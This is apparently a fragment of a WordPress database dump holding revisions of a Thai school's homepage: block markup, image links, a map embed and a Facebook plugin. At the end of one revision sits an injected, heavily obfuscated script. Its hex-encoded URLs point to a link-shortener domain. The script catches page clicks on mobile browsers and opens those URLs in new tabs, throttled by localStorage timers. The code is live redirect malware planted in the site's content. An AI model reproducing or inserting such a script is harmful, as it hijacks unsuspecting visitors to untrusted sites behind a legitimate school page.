class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1908,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://script.google.com/macros/s/AKfycbyfuu5DE6Sug1gTORaEw1XTMD3zj82GVkMIkPseb_e71HZWAqbrLMuADBmWcyARoaNa/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การลา-1.png\" alt=\"\" class=\"wp-image-1908\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-08-27 14:13:29','2025-08-27 07:13:29','',14,'http://pakhaeng.ssk.in.th/?p=1998',0,'revision','',0),
(2000,1,'2025-08-27 14:15:25','2025-08-27 07:15:25','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_8eda8b-3a\",\"columns\":[1,1,1,1,1,1],\"thumbSize\":\"full\",\"ids\":[1904],\"type\":\"grid\",\"imageRatio\":\"land169\",\"linkTo\":\"custom\",\"captionStyles\":[{\"size\":[\"\",\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":6,\"textTransform\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"background\":\"#000000\",\"backgroundOpacity\":0.5}],\"autoPlay\":true,\"transSpeed\":1000,\"slidesScroll\":\"all\",\"arrowStyle\":\"none\",\"dotStyle\":\"light\",\"imagesDynamic\":[{\"id\":1904,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=1904\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbyztUtl8EM-IiB9-zUQiX6uZlpuS1009A7GnLyQYTDE88aCpW5lZ-fTDR-YT54UB2_i/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/prr-1.png\",\"width\":1600,\"height\":900}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 